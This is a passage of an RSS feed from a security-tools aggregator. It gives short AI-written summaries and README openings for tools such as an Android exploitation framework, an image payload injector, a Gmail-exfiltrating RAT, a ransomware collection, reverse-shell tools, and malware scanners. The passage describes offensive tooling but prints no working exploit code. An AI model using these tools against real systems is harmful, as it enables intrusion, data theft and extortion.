&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PhoneSploit Pro is an advanced Python-based tool designed for penetration testing and exploiting Android devices remotely through the Android Debug Bridge (ADB) and Metasploit Framework integration. It automates the process of creating, installing, and launching payloads to gain a Meterpreter session in a single click, along with extensive ADB functionalities for managing connected devices, such as file transfers, device control, and data extraction. Notable features include remote screen recording, SMS management, and capabilities for controlling device operations, making it a comprehensive toolkit for security assessments on Android platforms.&lt;/p&gt;</description></item><item><title>PHP-Antimalware-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/marcocesarato-php-antimalware-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marcocesarato-php-antimalware-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PHP Antimalware Scanner is a PHP-based tool designed to scan projects for malicious code embedded within PHP files. Its primary use case is to detect potential malware through an interactive console interface or in a reporting mode that generates results in HTML or text. Notable features include customizable scanning options for file paths, action prompts upon detection of malware, and compatibility with various PHP configurations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;p&gt;&lt;img src="images/logo.png" alt="Version"&gt;&lt;/p&gt;
&lt;h1 align="center"&gt;PHP Antimalware Scanner&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/version-0.15.1-brightgreen?style=for-the-badge" alt="Version"&gt;
&lt;img src="https://img.shields.io/badge/php-%3E%3D%207.4-4F5D95?style=for-the-badge" alt="Requirements"&gt;
&lt;img src="https://img.shields.io/badge/code%20style-PSR-blue?style=for-the-badge" alt="Code Style"&gt;
&lt;img src="https://img.shields.io/github/license/marcocesarato/PHP-Antimalware-Scanner?style=for-the-badge" alt="License"&gt;
&lt;a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner"&gt;&lt;img src="https://img.shields.io/badge/GitHub-Repo-6f42c1?style=for-the-badge" alt="GitHub"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>pixload</title><link>https://rainmana.github.io/hackyfeed/tools/sighook-pixload/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sighook-pixload/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pixload is a set of tools designed for creating and injecting payloads into image files, supporting formats like BMP, GIF, JPG, PNG, and WebP. Its primary use case is for stealthy payload delivery, enabling users to embed malicious code within legitimate image files while maintaining their validity. Notable features include straightforward command-line usage for various image types and integration with Metasploit for payload generation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="pixload--image-payload-creating-tools"&gt;pixload &amp;ndash; Image Payload Creating tools&lt;/h1&gt;
&lt;h2 id="description"&gt;DESCRIPTION&lt;/h2&gt;
&lt;p&gt;Set of tools for &lt;del&gt;hiding backdoors&lt;/del&gt; creating/injecting payload into images.&lt;/p&gt;</description></item><item><title>plasma</title><link>https://rainmana.github.io/hackyfeed/tools/plasma-disassembler-plasma/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/plasma-disassembler-plasma/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PLASMA is an interactive disassembler that converts binary code into more readable assembly language with syntax highlighting, supporting architectures such as x86_64, ARM, and MIPS, along with ELF and PE formats. Its notable features include a Python API for scripting capabilities, allowing users to perform tasks like pseudo-decompilation, flow graph manipulation, and code assembly. The tool is currently under development and offers additional functionality through optional libraries for enhanced features.&lt;/p&gt;</description></item><item><title>PowerShell-for-Hackers</title><link>https://rainmana.github.io/hackyfeed/tools/i-am-jakoby-powershell-for-hackers/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/i-am-jakoby-powershell-for-hackers/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PowerShell for Hackers is a repository of customizable PowerShell functions designed to aid in developing payloads for security testing and ethical hacking. Key features include a variety of functions with descriptions, usage examples, and accompanying video tutorials, which facilitate the creation of payloads for diverse scenarios such as system manipulation, desktop interactions, and data concealment. This collection emphasizes community collaboration, allowing users to contribute their own functions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;&lt;h3&gt;2022 Hak5 hacker of the Year&lt;/h3&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src="https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/hak5-banner.png" alt="hak 5"&gt;&lt;/p&gt;</description></item><item><title>Powershell-RAT</title><link>https://rainmana.github.io/hackyfeed/tools/viralmaniar-powershell-rat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/viralmaniar-powershell-rat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Powershell-RAT is a Python-based remote access tool designed for red team engagements to backdoor Windows machines. Its primary use case involves tracking user activity through screen captures and exfiltrating data via email attachments using Gmail. Key features include stealthy operation, the ability to execute tasks such as taking screenshots and scheduling tasks, and a comprehensive &amp;ldquo;Hail Mary&amp;rdquo; option for automated execution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="powershell-rat"&gt;Powershell-RAT&lt;/h1&gt;
&lt;p&gt;Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.&lt;/p&gt;</description></item><item><title>privacy-respecting</title><link>https://rainmana.github.io/hackyfeed/tools/nikivdev-privacy-respecting/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nikivdev-privacy-respecting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Privacy Respecting&amp;rdquo; repository is a curated list of services and software alternatives that prioritize user privacy, aiming to offer users choices away from platforms that collect extensive personal data. It categorizes privacy-focused options across various domains such as search engines, social networks, and cloud storage, while providing insights on the implications of using mainstream services. Notable features include detailed explanations for suggested alternatives and a structured format for easy navigation through the listed services.&lt;/p&gt;</description></item><item><title>PrivescCheck</title><link>https://rainmana.github.io/hackyfeed/tools/itm4n-privesccheck/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/itm4n-privesccheck/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PrivescCheck is a PowerShell script designed for identifying common Windows vulnerabilities and configuration issues outside the scope of public security standards, facilitating exploitation and post-exploitation tasks. It allows users to run various checks—including basic, extended, and audit checks—generate human-readable reports in multiple formats (TXT, HTML, CSV, XML), and includes options for silent execution and risky checks, making it suitable for penetration testing, research, and auditing purposes. Notably, the tool performs context-aware access control checks to provide accurate findings based on the current user&amp;rsquo;s privileges.&lt;/p&gt;</description></item><item><title>project-restoration</title><link>https://rainmana.github.io/hackyfeed/tools/leoetlino-project-restoration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/leoetlino-project-restoration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Project Restoration is a patch for &lt;em&gt;Majora&amp;rsquo;s Mask 3D&lt;/em&gt; that reintroduces mechanics from the original game while resolving gameplay issues to enhance player experience. Notable features include an improved swimming mechanic for Zora Link, adjustments to the Inverted Song of Time&amp;rsquo;s effect, and modifications to the Twinmold battle for clarity and pacing. The project aims to blend the best aspects of the original game with the enhanced graphics of the remaster, ensuring a polished gameplay experience without game-breaking issues.&lt;/p&gt;</description></item><item><title>pspy</title><link>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-pspy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-pspy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pspy is an unprivileged Linux process monitoring tool that allows users to observe commands executed by other processes, including cron jobs, in real-time without requiring root access. It leverages procfs scans and inotify filesystem watchers to detect short-lived processes and can be particularly useful for system enumeration in Capture The Flag (CTF) challenges, as well as for demonstrating secure coding practices regarding command-line argument handling. Notable features include customizable process and filesystem event monitoring, with options for output formatting and scan intervals.&lt;/p&gt;</description></item><item><title>psudohash</title><link>https://rainmana.github.io/hackyfeed/tools/t3l3machus-psudohash/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/t3l3machus-psudohash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Psudohash is a customizable password list generator designed for orchestrating brute force attacks and cracking hashes by mimicking human password creation patterns. Key features include in-order and all-order combinations of keyword permutations, leet character substitution, common padding value additions, and filtering options based on word length, making it particularly effective for pentesting corporate environments where standard naming conventions are often used in passwords.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="psudohash"&gt;psudohash&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/python-3.x-yellow.svg" alt="Python 3.x"&gt;&lt;/a&gt; &lt;a href="https://github.com/t3l3machus/psudohash/blob/main/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-red.svg" alt="License"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/badge/Maintained%3F-Yes-23a82c"&gt;
&lt;img src="https://img.shields.io/badge/Developed%20on-kali%20linux-blueviolet"&gt;&lt;/p&gt;
&lt;h2 id="cool-new-features-of-v110"&gt;Cool New Features of v1.1.0&lt;/h2&gt;
&lt;p&gt;Special thanks to &lt;a href="https://github.com/DavidAngelos"&gt;DavidAngelos&lt;/a&gt;:&lt;br&gt;
▶️ Added a progress bar in every step to track execution.&lt;br&gt;
▶️ Added options:&lt;/p&gt;</description></item><item><title>pwnagotchi</title><link>https://rainmana.github.io/hackyfeed/tools/jayofelony-pwnagotchi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jayofelony-pwnagotchi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwnagotchi is a Raspberry Pi-based tool designed for capturing WPA key material from Wi-Fi networks using passive and active techniques, generating PCAP files compatible with hashcat for cracking. Notable features include the ability to perform full and half WPA handshake captures, utilize PMKID attacks, and facilitate communication between multiple Pwnagotchi units through a custom protocol. The tool has removed AI components to enhance stability and battery life during operation.&lt;/p&gt;</description></item><item><title>pwncat</title><link>https://rainmana.github.io/hackyfeed/tools/cytopia-pwncat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cytopia-pwncat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwncat is a powerful networking tool that enhances the capabilities of traditional netcat by incorporating advanced features such as evasion techniques for firewalls and intrusion detection/prevention systems, along with support for both bind and reverse shells. Its self-injecting shell functionality and extensive scripting support using Python make it particularly effective for penetration testing and exploitation scenarios. Notably, it facilitates seamless port forwarding and maintains a user-friendly interface for enhanced usability in complex network environments.&lt;/p&gt;</description></item><item><title>pwndbg</title><link>https://rainmana.github.io/hackyfeed/tools/pwndbg-pwndbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pwndbg-pwndbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwndbg is a Python module designed as a plugin for GDB and LLDB, enhancing the debugging experience for developers working on low-level software, reverse engineering, and exploit development. Its primary use case is to streamline common debugging tasks by providing user-friendly features and a suite of utilities that address the shortcomings of vanilla GDB and LLDB. Notable features include an improved hexdump command, a clean interface for quick navigation, and a range of custom tools to facilitate debugging across different platforms and architectures.&lt;/p&gt;</description></item><item><title>pythem</title><link>https://rainmana.github.io/hackyfeed/tools/m4n3dw0lf-pythem/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4n3dw0lf-pythem/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pythem is a versatile penetration testing framework written in Python, designed for use by security researchers and professionals to conduct various security assessments within legal boundaries. Notable features include support for attacks such as ARP spoofing, DNS manipulation, brute force attacks on SSH and web forms, as well as tools for exploit development and packet filtering. The framework can be installed on Debian-based Linux distributions, or run as a Docker container, facilitating accessibility and ease of deployment.&lt;/p&gt;</description></item><item><title>Qu1cksc0pe</title><link>https://rainmana.github.io/hackyfeed/tools/cyb3rmx-qu1cksc0pe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyb3rmx-qu1cksc0pe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Qu1cksc0pe is a comprehensive malware analysis tool designed to analyze various file types, including Windows executables, Linux binaries, Android APKs, and email files, utilizing both static and dynamic analysis methods. It provides detailed insights such as DLL usage, API functions, embedded executables, and MITRE ATT&amp;amp;CK mappings, facilitating in-depth evaluation of potentially malicious files. The tool also features a user-friendly web interface and robust error handling to enhance usability, especially within different operating system environments.&lt;/p&gt;</description></item><item><title>quark-engine</title><link>https://rainmana.github.io/hackyfeed/tools/ev-flow-quark-engine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ev-flow-quark-engine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Quark Engine is a comprehensive tool designed for malware family analysis and vulnerability assessment, particularly in the context of Android malware. Its primary use case involves identifying and reporting on various malware behaviors and signatures, enabling security researchers to assess risks and improve defenses. Notable features include detailed analysis reports, a rule-based scoring system for malware, and compatibility with Python 3.10, making it accessible for developers and cybersecurity professionals.&lt;/p&gt;</description></item><item><title>Raccoon</title><link>https://rainmana.github.io/hackyfeed/tools/evyatarmeged-raccoon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/evyatarmeged-raccoon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Raccoon is an offensive security tool designed for reconnaissance and information gathering, offering a wide range of features like DNS enumeration, WHOIS lookup, TLS data analysis, port scanning, and directory fuzzing. With support for asynchronous scanning via Python&amp;rsquo;s asyncio and anonymity through Tor/proxies, it provides efficient and robust scanning capabilities while organizing outputs by target and scan type. Additionally, it leverages default wordlists from SecLists for various reconnaissance tasks, enhancing its operational effectiveness.&lt;/p&gt;</description></item><item><title>RamiGPT</title><link>https://rainmana.github.io/hackyfeed/tools/m507-ramigpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m507-ramigpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RamiGPT is an AI-driven offensive security tool that facilitates privilege escalation to root accounts using OpenAI&amp;rsquo;s technology and PwnTools. Its primary use case involves quickly exploiting vulnerabilities across various systems, achieving root access in under a minute, as demonstrated by its performance on multiple VulnHub scenarios. The tool features a user-friendly GUI and seamless integration with Docker for easy deployment and configuration, leveraging tools like BeRoot and LinPEAS for effective enumeration.&lt;/p&gt;</description></item><item><title>Ransomware</title><link>https://rainmana.github.io/hackyfeed/tools/err0r-ica-ransomware/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/err0r-ica-ransomware/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ransomware collection repository provides a suite of ransomware scripts designed for educational and testing purposes. Users are cautioned against executing these scripts on their devices due to their malicious nature. Key features include compatibility with multiple operating systems such as Termux, Kali Linux, Ubuntu, and others, thereby making it a versatile tool for research and development in cybersecurity contexts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://i.postimg.cc/qJwVsmT0/OIG3-3.jpg" alt="logo"&gt;&lt;/p&gt;
&lt;h1 id="-ransomwares-collection-"&gt;☣️ Ransomwares Collection ☣️&lt;/h1&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-diff" data-lang="diff"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;- Don&amp;#39;t Run Them on Your Device.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;- Handle with caution 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="-installation-"&gt;💿 Installation 💿&lt;/h2&gt;
&lt;p&gt;git clone &lt;a href="https://github.com/Err0r-ICA/Ransomware"&gt;https://github.com/Err0r-ICA/Ransomware&lt;/a&gt; &lt;br&gt;
cd Ransomware &lt;br&gt;
python3 Ransomware &lt;br&gt;&lt;/p&gt;</description></item><item><title>Ransomware-Tool-Matrix</title><link>https://rainmana.github.io/hackyfeed/tools/bushidouk-ransomware-tool-matrix/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bushidouk-ransomware-tool-matrix/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ransomware Tool Matrix repository provides an extensive catalog of tools utilized by various ransomware gangs, enabling cybersecurity defenders to identify and mitigate threats effectively. This resource can be leveraged for threat hunting, incident response, and adversary emulation by tracking the tools&amp;rsquo; usage patterns and associated tactics, techniques, and procedures (TTPs). Notable features include categorized lists of tools—including those for credential theft, defense evasion, and networking—as well as links to relevant threat intelligence reports and resources.&lt;/p&gt;</description></item><item><title>rapidscan</title><link>https://rainmana.github.io/hackyfeed/tools/skavngr-rapidscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skavngr-rapidscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RapidScan is a multifaceted web vulnerability scanner that automates the execution of various security scanning tools to efficiently uncover and assess vulnerabilities in web applications. Notable features include its one-step installation, support for multiple tools like nmap and nikto, the ability to correlate results to reduce false positives, and the provision of detailed vulnerability definitions and remediation strategies. The tool is designed to streamline the penetration testing process, saving valuable time while offering comprehensive reporting and future plans for AI-driven tool deployment based on detected issues.&lt;/p&gt;</description></item><item><title>readpe</title><link>https://rainmana.github.io/hackyfeed/tools/mentebinaria-readpe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mentebinaria-readpe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; readpe is a comprehensive command line toolkit designed for the analysis and manipulation of PE (Portable Executable) binaries across multiple platforms. Its primary use case involves providing developers and security analysts with tools to inspect, modify, and understand the structure of PE files. Notable features include easy installation and building on various operating systems, as well as its background as a successor to the original pev tool, with enhanced functionality integrated into a single repository.&lt;/p&gt;</description></item><item><title>ReC98</title><link>https://rainmana.github.io/hackyfeed/tools/nmlgc-rec98/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nmlgc-rec98/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReC98 is a reverse-engineering project that aims to reconstruct the source code of the first five Touhou Project games originally released for the NEC PC-9801 system. It allows for perfect replications of the original binaries, thus maintaining the integrity of the source while enabling modding and porting efforts by providing a comprehensible codebase. Notable features include the preservation of the original game&amp;rsquo;s mechanics, position independence, and support for community modifications.&lt;/p&gt;</description></item><item><title>reconmap</title><link>https://rainmana.github.io/hackyfeed/tools/reconmap-reconmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reconmap-reconmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reconmap is an open-source penetration testing management and automation platform that aids security professionals throughout the engagement lifecycle by efficiently planning, executing, and reporting on security assessments. Its notable features include real-time execution and scheduling of security commands, automated output capture, vulnerability tracking, and the generation of professional reports in multiple formats, all aimed at streamlining workflows and enhancing collaboration among InfoSec teams.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div style="text-align: center;"&gt;
&lt;h1&gt;Reconmap&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://bsky.app/profile/netfoe.com"&gt;&lt;img src="https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fpublic.api.bsky.app%2Fxrpc%2Fapp.bsky.actor.getProfile%2F%3Factor%3Dnetfoe.com&amp;amp;query=%24.followersCount&amp;amp;style=social&amp;amp;logo=bluesky&amp;amp;label=Follow%20us%20on%20BlueSky&amp;amp;style=flat" alt="Bluesky"&gt;&lt;/a&gt;
&lt;a href="https://www.youtube.com/reconmap"&gt;&lt;img src="https://img.shields.io/youtube/channel/subscribers/UCKJM12YKHqvvATHkdIKopeQ?style=flat&amp;amp;logo=youtube&amp;amp;label=Subscribe%20to%20our%20YouTube%20channel&amp;amp;link=https%3A%2F%2Fwww.youtube.com%2Freconmap" alt="YouTube Channel Subscribers"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Reconnoitre</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-reconnoitre/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-reconnoitre/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reconnoitre is a reconnaissance tool designed for automating information gathering and service enumeration tailored for OSCP labs. Its primary use case involves creating a structured directory for storing results, findings, and recommended commands for each target host while offering features like DNS and SNMP sweeps, service scanning, and virtual host discovery using customizable wordlists. The tool emphasizes ease of use and flexibility, allowing users to execute tailored reconnaissance operations efficiently.&lt;/p&gt;</description></item><item><title>redamon</title><link>https://rainmana.github.io/hackyfeed/tools/samugit83-redamon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samugit83-redamon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RedAmon is an autonomous AI framework designed for seamless cybersecurity operations that integrate reconnaissance, exploitation, and post-exploitation processes into a streamlined pipeline. It stands out by automatically triaging findings, applying code fixes, and generating pull requests in repositories, ensuring human oversight at critical junctures. Its notable features include support for over 38 security tools, integration with major vulnerability scanners, and configurable autonomy to adapt to various security assessment needs.&lt;/p&gt;</description></item><item><title>RedTeam-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/a-poc-redteam-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/a-poc-redteam-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RedTeam-Tools is a comprehensive repository containing over 150 tools and resources specifically designed for red teaming activities, encompassing both targeted tools and general-purpose utilities adaptable for offensive operations. Notable features include a variety of specialized tips for advanced red team techniques, as well as tools for reconnaissance, exploitation, and post-exploitation, catering to a wide range of attack vectors and methodologies. This collection serves as both a practical toolkit and an educational resource for those engaged in offensive cybersecurity practices.&lt;/p&gt;</description></item><item><title>refinery</title><link>https://rainmana.github.io/hackyfeed/tools/binref-refinery/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/binref-refinery/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Binary Refinery is a command-line toolkit designed for the transformation of binary data, focusing on malware triage analysis through various scripts that handle tasks like compression and encryption. It enables users to create flexible processing pipelines by chaining scripts with the piping operator. Key features include the ability to read from stdin and write to stdout, extensive documentation accessible via command-line help, and an emphasis on modular units that perform singular tasks efficiently.&lt;/p&gt;</description></item><item><title>rengine</title><link>https://rainmana.github.io/hackyfeed/tools/yogeshojha-rengine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yogeshojha-rengine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; reNgine is a comprehensive web reconnaissance and vulnerability scanning tool aimed at security professionals, penetration testers, and bug bounty hunters. It features a highly configurable engine, data correlation capabilities, continuous monitoring, and a database-backed reconnaissance system, with the latest update including enhancements like a bounty hub integration, subdomain enumeration tools, and customizable reporting templates. This tool streamlines the reconnaissance process, enhancing efficiency and effectiveness in identifying vulnerabilities across web applications.&lt;/p&gt;</description></item><item><title>requests-ip-rotator</title><link>https://rainmana.github.io/hackyfeed/tools/ge0rg3-requests-ip-rotator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ge0rg3-requests-ip-rotator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; requests-ip-rotator is a Python library designed to leverage AWS API Gateway&amp;rsquo;s extensive IP pool to generate numerous unique IP addresses for web scraping and brute forcing, enabling users to circumvent IP-based rate limits. The tool automatically randomizes the X-Forwarded-For headers to obscure the client&amp;rsquo;s true IP while allowing for easy integration with the requests library. Notably, it offers both manual and automatic gateway management methods for user convenience, along with cost-effective usage under AWS&amp;rsquo;s free tier.&lt;/p&gt;</description></item><item><title>retoolkit</title><link>https://rainmana.github.io/hackyfeed/tools/mentebinaria-retoolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mentebinaria-retoolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Retoolkit is a comprehensive suite designed for reverse engineering and malware analysis on x86 and x64 Windows systems, providing users with an easy setup of essential tools. Notable features include a pre-configured environment for popular applications such as x64dbg, streamlined access via desktop shortcuts or context menus, and support for command-line operations from any directory. This toolkit is particularly advantageous for quickly establishing a new analysis virtual machine.&lt;/p&gt;</description></item><item><title>reverse_ssh</title><link>https://rainmana.github.io/hackyfeed/tools/nhas-reverse_ssh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nhas-reverse_ssh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reverse SSH is a tool designed for establishing reverse shells using SSH, enabling secure connections for remote management and file transfer. Its primary use case revolves around providing a reliable method for accessing and controlling remote systems, featuring capabilities such as dynamic port forwarding, native SCP/SFTP support, and multiple network transports like HTTP and TLS. Notable features include mutual client-server authentication, a full Windows shell experience, and advanced functionalities like fileless execution and built-in HTTP server capabilities for dynamic client generation.&lt;/p&gt;</description></item><item><title>reverse-linear-sync-engine</title><link>https://rainmana.github.io/hackyfeed/tools/wzhudev-reverse-linear-sync-engine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wzhudev-reverse-linear-sync-engine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Reverse Engineering Linear&amp;rsquo;s Sync Engine&amp;rdquo; project provides an in-depth analysis of Linear&amp;rsquo;s Sync Engine (LSE), aimed at enhancing collaborative software applications through an intuitive and efficient synchronization solution. Its primary use case is to support real-time collaboration by managing edits while offering critical features like partial syncing, permission controls, and offline availability, all wrapped in a developer-friendly API. The project emphasizes the balance of complexity and usability, highlighting LSE&amp;rsquo;s adaptability for various data models without requiring extensive expertise in sync technologies.&lt;/p&gt;</description></item><item><title>reverse-ssh</title><link>https://rainmana.github.io/hackyfeed/tools/fahrj-reverse-ssh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fahrj-reverse-ssh/</guid><description>&lt;blockquote&gt;
